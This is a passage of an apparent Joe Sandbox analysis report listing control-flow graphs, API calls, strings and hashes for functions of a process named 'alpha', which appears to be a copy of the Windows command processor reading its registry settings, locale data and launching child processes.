iswdigit 345->349 348->285 353 7ff71966ac96-7ff71966acaa wcsrchr 348->353 354 7ff71967bdd9-7ff71967bddd 349->354 355 7ff71967bddf-7ff71967bdeb towlower 349->355 353->285 358 7ff71966acac-7ff71966acb9 call 7ff719671300 353->358 359 7ff71967bdee-7ff71967be0f iswdigit 354->359 355->359 356->337 360 7ff71966ac1a-7ff71966ac33 memset 356->360 357->249 358->285 363 7ff71967be17-7ff71967be23 towlower 359->363 364 7ff71967be11-7ff71967be15 359->364 360->308 365 7ff71966ac35-7ff71966ac4b wcschr 360->365 366 7ff71967be26-7ff71967be45 call 7ff7196713e0 363->366 364->366 365->308 367 7ff71966ac4d-7ff71966ac54 365->367 366->332 368 7ff71966ac5a-7ff71966ac6f wcschr 367->368 369 7ff71966ad72-7ff71966ad91 wcschr 367->369 368->308 368->369 371 7ff71966ad97-7ff71966adac wcschr 369->371 372 7ff71966af03-7ff71966af07 369->372 371->372 373 7ff71966adb2-7ff71966adc7 wcschr 371->373 372->308 373->372 374 7ff71966adcd-7ff71966ade2 wcschr 373->374 374->372 375 7ff71966ade8-7ff71966adfd wcschr 374->375 375->372 376 7ff71966ae03-7ff71966ae18 wcschr 375->376 376->372 377 7ff71966ae1e-7ff71966ae21 376->377 378 7ff71966ae24-7ff71966ae27 377->378 378->372 379 7ff71966ae2d-7ff71966ae40 iswspace 378->379 380 7ff71966ae4b-7ff71966ae5e 379->380 381 7ff71966ae42-7ff71966ae49 379->381 382 7ff71966ae66-7ff71966ae6d 380->382 381->378 382->382 383 7ff71966ae6f-7ff71966ae77 382->383 383->258 384 7ff71966ae7d-7ff71966ae97 call 7ff7196713e0 383->384 387 7ff71966ae9a-7ff71966aea4 384->387 388 7ff71966aebc-7ff71966aef8 call 7ff719670a6c call 7ff71966ff70 * 2 387->388 389 7ff71966aea6-7ff71966aead 387->389 388->319 397 7ff71966aefe 388->397 389->388 390 7ff71966aeaf-7ff71966aeba 389->390 390->387 390->388 397->279
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                    • String ID: :$:$:$:ON$OFF
                                                                    • API String ID: 972821348-467788257
                                                                    • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                    • Instruction ID: 97262ecf8e79902d50769dc8b569dd8ca6c92f8ad9d7ad7864de2d5724bb48ad
                                                                    • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                    • Instruction Fuzzy Hash: AA22A421A08E4286EB58BF259514279E6B3EF55BA9FC89035CA0E47794DF3CE44EC370

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 398 7ff7196751ec-7ff719675248 call 7ff719675508 GetLocaleInfoW 401 7ff71967524e-7ff719675272 GetLocaleInfoW 398->401 402 7ff71967ef32-7ff71967ef3c 398->402 403 7ff719675295-7ff7196752b9 GetLocaleInfoW 401->403 404 7ff719675274-7ff71967527a 401->404 405 7ff71967ef3f-7ff71967ef49 402->405 410 7ff7196752de-7ff719675305 GetLocaleInfoW 403->410 411 7ff7196752bb-7ff7196752c3 403->411 408 7ff7196754f7-7ff7196754f9 404->408 409 7ff719675280-7ff719675286 404->409 406 7ff71967ef4b-7ff71967ef52 405->406 407 7ff71967ef61-7ff71967ef6c 405->407 406->407 412 7ff71967ef54-7ff71967ef5f 406->412 415 7ff71967ef75-7ff71967ef78 407->415 408->402 409->408 413 7ff71967528c-7ff71967528f 409->413 416 7ff719675307-7ff71967531b 410->416 417 7ff719675321-7ff719675343 GetLocaleInfoW 410->417 414 7ff7196752c9-7ff7196752d7 411->414 411->415 412->405 412->407 413->403 414->410 420 7ff71967ef7a-7ff71967ef7d 415->420 421 7ff71967ef99-7ff71967efa3 415->421 416->417 418 7ff719675349-7ff71967536e GetLocaleInfoW 417->418 419 7ff71967efaf-7ff71967efb9 417->419 422 7ff719675374-7ff719675396 GetLocaleInfoW 418->422 423 7ff71967eff2-7ff71967effc 418->423 425 7ff71967efbc-7ff71967efc6 419->425 420->410 424 7ff71967ef83-7ff71967ef8d 420->424 421->419 427 7ff71967539c-7ff7196753be GetLocaleInfoW 422->427 428 7ff71967f035-7ff71967f03f 422->428 426 7ff71967efff-7ff71967f009 423->426 424->421 429 7ff71967efde-7ff71967efe9 425->429 430 7ff71967efc8-7ff71967efcf 425->430 431 7ff71967f00b-7ff71967f012 426->431 432 7ff71967f021-7ff71967f02c 426->432 433 7ff71967f078-7ff71967f082 427->433 434 7ff7196753c4-7ff7196753e6 GetLocaleInfoW 427->434 435 7ff71967f042-7ff71967f04c 428->435 429->423 430->429 436 7ff71967efd1-7ff71967efdc 430->436 431->432 437 7ff71967f014-7ff71967f01f 431->437 432->428 442 7ff71967f085-7ff71967f08f 433->442 438 7ff71967f0bb-7ff71967f0c5 434->438 439 7ff7196753ec-7ff71967540e GetLocaleInfoW 434->439 440 7ff71967f04e-7ff71967f055 435->440 441 7ff71967f064-7ff71967f06f 435->441 436->425 436->429 437->426 437->432 443 7ff71967f0c8-7ff71967f0d2 438->443 444 7ff71967f0fe-7ff71967f108 439->444 445 7ff719675414-7ff719675436 GetLocaleInfoW 439->445 440->441 446 7ff71967f057-7ff71967f062 440->446 441->433 447 7ff71967f0a7-7ff71967f0b2 442->447 448 7ff71967f091-7ff71967f098 442->448 449 7ff71967f0ea-7ff71967f0f5 443->449 450 7ff71967f0d4-7ff71967f0db 443->450 453 7ff71967f10b-7ff71967f115 444->453 451 7ff71967543c-7ff71967545e GetLocaleInfoW 445->451 452 7ff71967f141-7ff71967f14b 445->452 446->435 446->441 447->438 448->447 454 7ff71967f09a-7ff71967f0a5 448->454 449->444 450->449 455 7ff71967f0dd-7ff71967f0e8 450->455 456 7ff71967f184-7ff71967f18b 451->456 457 7ff719675464-7ff719675486 GetLocaleInfoW 451->457 460 7ff71967f14e-7ff71967f158 452->460 458 7ff71967f12d-7ff71967f138 453->458 459 7ff71967f117-7ff71967f11e 453->459 454->442 454->447 455->443 455->449 463 7ff71967f18e-7ff71967f198 456->463 464 7ff71967548c-7ff7196754ae GetLocaleInfoW 457->464 465 7ff71967f1c4-7ff71967f1ce 457->465 458->452 459->458 466 7ff71967f120-7ff71967f12b 459->466 461 7ff71967f15a-7ff71967f161 460->461 462 7ff71967f170-7ff71967f17b 460->462 461->462 467 7ff71967f163-7ff71967f16e 461->467 462->456 468 7ff71967f19a-7ff71967f1a1 463->468 469 7ff71967f1b0-7ff71967f1bb 463->469 470 7ff71967f207-7ff71967f20e 464->470 471 7ff7196754b4-7ff7196754f5 setlocale call 7ff719678f80 464->471 472 7ff71967f1d1-7ff71967f1db 465->472 466->453 466->458 467->460 467->462 468->469 474 7ff71967f1a3-7ff71967f1ae 468->474 469->465 473 7ff71967f211-7ff71967f21b 470->473 476 7ff71967f1dd-7ff71967f1e4 472->476 477 7ff71967f1f3-7ff71967f1fe 472->477 478 7ff71967f21d-7ff71967f224 473->478 479 7ff71967f233-7ff71967f23e 473->479 474->463 474->469 476->477 481 7ff71967f1e6-7ff71967f1f1 476->481 477->470 478->479 482 7ff71967f226-7ff71967f231 478->482 481->472 481->477 482->473 482->479
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$DefaultUsersetlocale
                                                                    • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                    • API String ID: 1351325837-2236139042
                                                                    • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                    • Instruction ID: 7e32d956b524dbf330336d3798bfefe9ca1359009d550b09cb8ff1c14cdd1532
                                                                    • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                    • Instruction Fuzzy Hash: 23F14931B08B4285EB29AF15D9106B9A2B6BF05BA8FD45175CA0D477A4EF3CE50EC330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 483 7ff719674224-7ff7196742a5 InitializeProcThreadAttributeList 484 7ff7196742ab-7ff7196742e5 UpdateProcThreadAttribute 483->484 485 7ff71967ecd4-7ff71967ecee GetLastError call 7ff719689eec 483->485 487 7ff7196742eb-7ff7196743c6 memset * 2 GetStartupInfoW call 7ff719673a90 call 7ff71966b900 484->487 488 7ff71967ecf0-7ff71967ed19 GetLastError call 7ff719689eec DeleteProcThreadAttributeList 484->488 492 7ff71967ed1e 485->492 497 7ff7196743cc-7ff7196743d3 487->497 498 7ff719674638-7ff719674644 _local_unwind 487->498 488->492 499 7ff719674649-7ff719674650 497->499 500 7ff7196743d9-7ff7196743dc 497->500 498->499 499->500 503 7ff719674656-7ff71967465d 499->503 501 7ff7196743de-7ff7196743f5 wcsrchr 500->501 502 7ff719674415-7ff719674424 call 7ff719675a68 500->502 501->502 504 7ff7196743f7-7ff71967440f lstrcmpW 501->504 510 7ff719674589-7ff719674590 502->510 511 7ff71967442a-7ff719674486 CreateProcessW 502->511 503->502 506 7ff719674663 503->506 504->502 507 7ff719674668-7ff71967466d call 7ff719689044 504->507 506->500 507->502 510->511 514 7ff719674596-7ff7196745fa CreateProcessAsUserW 510->514 513 7ff71967448b-7ff71967448f 511->513 515 7ff719674495-7ff7196744c7 CloseHandle call 7ff71967498c 513->515 516 7ff719674672-7ff719674682 GetLastError 513->516 514->513 519 7ff71967468d-7ff719674694 515->519 520 7ff7196744cd-7ff7196744e5 515->520 516->519 521 7ff719674696-7ff7196746a0 519->521 522 7ff7196746a2-7ff7196746ac 519->522 523 7ff7196744eb-7ff7196744f2 520->523 524 7ff7196747a3-7ff7196747a9 520->524 521->522 525 7ff7196746ae-7ff7196746b5 call 7ff7196797bc 521->525 522->525 526 7ff719674705-7ff719674707 522->526 528 7ff7196744f8-7ff719674507 523->528 529 7ff7196745ff-7ff719674607 523->529 538 7ff7196746b7-7ff719674701 call 7ff7196bc038 525->538 539 7ff719674703 525->539 526->520 527 7ff71967470d-7ff71967472a call 7ff71966cd90 526->527 547 7ff71967473d-7ff719674767 call 7ff7196713e0 call 7ff719689eec call 7ff71966ff70 _local_unwind 527->547 548 7ff71967472c-7ff719674738 _local_unwind 527->548 533 7ff71967450d-7ff719674553 call 7ff719675cb4 call 7ff7196733f0 call 7ff71967498c 528->533 534 7ff719674612-7ff719674616 528->534 529->528 535 7ff71967460d 529->535 564 7ff719674558-7ff71967455e 533->564 540 7ff71967461c-7ff719674633 534->540 541 7ff7196747d7-7ff7196747df 534->541 537 7ff71967476c-7ff719674773 535->537 537->528 544 7ff719674779-7ff719674780 537->544 538->526 539->526 546 7ff7196747f2-7ff71967483c call 7ff71966ff70 DeleteProcThreadAttributeList call 7ff719678f80 540->546 541->546 549 7ff7196747e1-7ff7196747ed CloseHandle 541->549 544->528 552 7ff719674786-7ff719674789 544->552 547->537 548->547 549->546 552->528 557 7ff71967478f-7ff719674792 552->557 557->524 561 7ff719674794-7ff71967479d call 7ff71968a250 557->561 561->524 561->528 567 7ff7196747ae-7ff7196747ca call 7ff7196733f0 564->567 568 7ff719674564-7ff719674579 call 7ff71967498c 564->568 567->541 568->546 576 7ff71967457f-7ff719674584 call 7ff71968a920 568->576 576->546
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                    • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                    • API String ID: 388421343-2905461000
                                                                    • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                    • Instruction ID: edf75a4013c308537c1351de25db269e68b6bbae3132b44bf6135d55df292c20
                                                                    • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                    • Instruction Fuzzy Hash: B0F15D31A08F8296EA24EF11E4547B9F7B6FB85BA8F804135DA4D46654DF3CE44ACB30

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 579 7ff719675554-7ff7196755b9 call 7ff71967a640 582 7ff7196755bc-7ff7196755e8 RegOpenKeyExW 579->582 583 7ff7196755ee-7ff719675631 RegQueryValueExW 582->583 584 7ff719675887-7ff71967588e 582->584 585 7ff71967f248-7ff71967f24d 583->585 586 7ff719675637-7ff719675675 RegQueryValueExW 583->586 584->582 587 7ff719675894-7ff7196758db time srand call 7ff719678f80 584->587 591 7ff71967f260-7ff71967f265 585->591 592 7ff71967f24f-7ff71967f25b 585->592 588 7ff71967568e-7ff7196756cc RegQueryValueExW 586->588 589 7ff719675677-7ff71967567c 586->589 595 7ff71967f2b6-7ff71967f2bb 588->595 596 7ff7196756d2-7ff719675710 RegQueryValueExW 588->596 593 7ff71967f28b-7ff71967f290 589->593 594 7ff719675682-7ff719675687 589->594 591->586 598 7ff71967f26b-7ff71967f286 _wtol 591->598 592->586 593->588 601 7ff71967f296-7ff71967f2b1 _wtol 593->601 594->588 602 7ff71967f2ce-7ff71967f2d3 595->602 603 7ff71967f2bd-7ff71967f2c9 595->603 599 7ff719675729-7ff719675767 RegQueryValueExW 596->599 600 7ff719675712-7ff719675717 596->600 598->586 607 7ff719675769-7ff71967576e 599->607 608 7ff71967579f-7ff7196757dd RegQueryValueExW 599->608 605 7ff71967571d-7ff719675722 600->605 606 7ff71967f2f9-7ff71967f2fe 600->606 601->588 602->596 604 7ff71967f2d9-7ff71967f2f4 _wtol 602->604 603->596 604->596 605->599 606->599 609 7ff71967f304-7ff71967f31a wcstol 606->609 610 7ff719675774-7ff71967578f 607->610 611 7ff71967f320-7ff71967f325 607->611 612 7ff71967f3a9 608->612 613 7ff7196757e3-7ff7196757e8 608->613 609->611 616 7ff71967f357-7ff71967f35e 610->616 617 7ff719675795-7ff719675799 610->617 614 7ff71967f34b 611->614 615 7ff71967f327-7ff71967f33f wcstol 611->615 620 7ff71967f3b5-7ff71967f3b8 612->620 618 7ff7196757ee-7ff719675809 613->618 619 7ff71967f363-7ff71967f368 613->619 614->616 615->614 616->608 617->608 617->616 623 7ff71967f39a-7ff71967f39d 618->623 624 7ff71967580f-7ff719675813 618->624 621 7ff71967f38e 619->621 622 7ff71967f36a-7ff71967f382 wcstol 619->622 625 7ff71967f3be-7ff71967f3c5 620->625 626 7ff71967582c 620->626 621->623 622->621 623->612 624->623 627 7ff719675819-7ff719675823 624->627 630 7ff719675832-7ff719675870 RegQueryValueExW 625->630 629 7ff71967f3ca-7ff71967f3d1 626->629 626->630 627->620 628 7ff719675829 627->628 628->626 631 7ff71967f3dd-7ff71967f3e2 629->631 630->631 632 7ff719675876-7ff719675882 RegCloseKey 630->632 633 7ff71967f3e4-7ff71967f412 ExpandEnvironmentStringsW 631->633 634 7ff71967f433-7ff71967f439 631->634 632->584 636 7ff71967f428 633->636 637 7ff71967f414-7ff71967f426 call 7ff7196713e0 633->637 634->632 635 7ff71967f43f-7ff71967f44c call 7ff71966b900 634->635 635->632 640 7ff71967f42e 636->640 637->640 640->634
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                    • API String ID: 145004033-3846321370
                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                    • Instruction ID: 8dfb8210560bba29bb15b528994f97170f1af16e267e284967015400b3b04b54
                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                    • Instruction Fuzzy Hash: B8E1703251CE82C6E750AF10E45057AF7B2FB89769F806175E68E02A58DF7CD54ACB30

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 821 7ff7196737d8-7ff719673887 GetCurrentThreadId OpenThread call 7ff7196704f4 HeapSetInformation RegOpenKeyExW 824 7ff71967388d-7ff7196738eb call 7ff719675920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff71967e9f8-7ff71967ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff71967ea41-7ff71967ea59 GetThreadLocale 824->828 829 7ff7196738f1-7ff719673913 memset 824->829 825->828 830 7ff71967ea5b-7ff71967ea67 828->830 831 7ff71967ea74-7ff71967ea77 828->831 832 7ff719673919-7ff719673935 call 7ff719674d5c 829->832 833 7ff71967eaa5 829->833 830->831 834 7ff71967ea79-7ff71967ea7d 831->834 835 7ff71967ea94-7ff71967ea96 831->835 841 7ff71967393b-7ff719673942 832->841 842 7ff71967eae2-7ff71967eaff call 7ff719663240 call 7ff719688530 call 7ff719674c1c 832->842 838 7ff71967eaa8-7ff71967eab4 833->838 834->835 837 7ff71967ea7f-7ff71967ea89 834->837 835->833 837->835 838->832 840 7ff71967eaba-7ff71967eac3 838->840 843 7ff71967eacb-7ff71967eace 840->843 845 7ff71967eb27-7ff71967eb40 _setjmp 841->845 846 7ff719673948-7ff719673962 _setjmp 841->846 852 7ff71967eb00-7ff71967eb0d 842->852 847 7ff71967eac5-7ff71967eac9 843->847 848 7ff71967ead0-7ff71967eadb 843->848 853 7ff7196739fe-7ff719673a05 call 7ff719674c1c 845->853 854 7ff71967eb46-7ff71967eb49 845->854 851 7ff719673968-7ff71967396d 846->851 846->852 847->843 848->838 849 7ff71967eadd 848->849 849->832 858 7ff7196739b9-7ff7196739bb 851->858 859 7ff71967396f 851->859 867 7ff71967eb15-7ff71967eb1f call 7ff719674c1c 852->867 853->825 855 7ff71967eb4b-7ff71967eb65 call 7ff719663240 call 7ff719688530 call 7ff719674c1c 854->855 856 7ff71967eb66-7ff71967eb6f call 7ff7196701b8 854->856 855->856 880 7ff71967eb87-7ff71967eb89 call 7ff7196786f0 856->880 881 7ff71967eb71-7ff71967eb82 _setmode 856->881 862 7ff7196739c1-7ff7196739c3 call 7ff719674c1c 858->862 863 7ff71967eb20 858->863 866 7ff719673972-7ff71967397d 859->866 877 7ff7196739c8 862->877 863->845 873 7ff7196739c9-7ff7196739de call 7ff71966df60 866->873 874 7ff71967397f-7ff719673984 866->874 867->863 873->867 889 7ff7196739e4-7ff7196739e8 873->889 874->866 882 7ff719673986-7ff7196739ae call 7ff719670580 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 874->882 877->873 890 7ff71967eb8e-7ff71967ebad call 7ff7196758e4 call 7ff71966df60 880->890 881->880 896 7ff7196739b3 882->896 889->853 893 7ff7196739ea-7ff7196739ef call 7ff71966be00 889->893 902 7ff71967ebaf-7ff71967ebb3 890->902 900 7ff7196739f4-7ff7196739fc 893->900 896->858 900->874 902->853 903 7ff71967ebb9-7ff71967ec24 call 7ff7196758e4 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 call 7ff71966be00 call 7ff719670580 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 902->903 903->890
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                    • API String ID: 2624720099-1920437939
                                                                    • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                    • Instruction ID: 372395347bc7f403845c0ec8cf9fb05f93f94c058e85580c472d7e823e1e84b7
                                                                    • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                    • Instruction Fuzzy Hash: 13C19331E08E428AF718BF65A451578EAB3BF45B6CFC45139D90E466A1DE3CE44E8730

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1118 7ff71967823c-7ff71967829b FindFirstFileExW 1119 7ff7196782cd-7ff7196782df 1118->1119 1120 7ff71967829d-7ff7196782a9 GetLastError 1118->1120 1124 7ff719678365-7ff71967837b FindNextFileW 1119->1124 1125 7ff7196782e5-7ff7196782ee 1119->1125 1121 7ff7196782af 1120->1121 1122 7ff7196782b1-7ff7196782cb 1121->1122 1126 7ff71967837d-7ff719678380 1124->1126 1127 7ff7196783d0-7ff7196783e5 FindClose 1124->1127 1128 7ff7196782f1-7ff7196782f4 1125->1128 1126->1119 1129 7ff719678386 1126->1129 1127->1128 1130 7ff719678329-7ff71967832b 1128->1130 1131 7ff7196782f6-7ff719678300 1128->1131 1129->1120 1130->1121 1134 7ff71967832d 1130->1134 1132 7ff719678332-7ff719678353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff719678302-7ff71967830e 1131->1133 1137 7ff719678356-7ff719678363 1132->1137 1135 7ff71967838b-7ff7196783c2 GetProcessHeap HeapReAlloc 1133->1135 1136 7ff719678310-7ff719678313 1133->1136 1134->1120 1138 7ff7196850f8-7ff71968511e GetLastError FindClose 1135->1138 1139 7ff7196783c8-7ff7196783ce 1135->1139 1140 7ff719678327 1136->1140 1141 7ff719678315-7ff719678323 1136->1141 1137->1136 1138->1122 1139->1137 1140->1130 1141->1140
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileFindFirstLast
                                                                    • String ID:
                                                                    • API String ID: 873889042-0
                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                    • Instruction ID: 835eafb7b527276c2d2f4fdca0a96576d702c344328a989d88d079be262578c1
                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                    • Instruction Fuzzy Hash: 5E514B31A09F428AE704AF11E554579FBB2FB49BAAF849131CA1D43350DF3CE85A8770

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1142 7ff719672978-7ff7196729b6 1143 7ff7196729b9-7ff7196729c1 1142->1143 1143->1143 1144 7ff7196729c3-7ff7196729c5 1143->1144 1145 7ff7196729cb-7ff7196729cf 1144->1145 1146 7ff71967e441 1144->1146 1147 7ff7196729d2-7ff7196729da 1145->1147 1148 7ff719672a1e-7ff719672a3e FindFirstFileW 1147->1148 1149 7ff7196729dc-7ff7196729e1 1147->1149 1151 7ff71967e435-7ff71967e439 1148->1151 1152 7ff719672a44-7ff719672a5c FindClose 1148->1152 1149->1148 1150 7ff7196729e3-7ff7196729eb 1149->1150 1150->1147 1153 7ff7196729ed-7ff719672a1c call 7ff719678f80 1150->1153 1151->1146 1154 7ff719672ae3-7ff719672ae5 1152->1154 1155 7ff719672a62-7ff719672a6e 1152->1155 1157 7ff719672aeb-7ff719672b10 _wcsnicmp 1154->1157 1158 7ff71967e3f7-7ff71967e3ff 1154->1158 1156 7ff719672a70-7ff719672a78 1155->1156 1156->1156 1160 7ff719672a7a-7ff719672a8d 1156->1160 1157->1155 1161 7ff719672b16-7ff71967e3f1 _wcsicmp 1157->1161 1160->1146 1163 7ff719672a93-7ff719672a97 1160->1163 1161->1155 1161->1158 1165 7ff719672a9d-7ff719672ade memmove call 7ff7196713e0 1163->1165 1166 7ff71967e404-7ff71967e407 1163->1166 1165->1150 1168 7ff71967e40b-7ff71967e413 1166->1168 1168->1168 1170 7ff71967e415-7ff71967e42b memmove 1168->1170 1170->1151
                                                                    Memory Dump Source
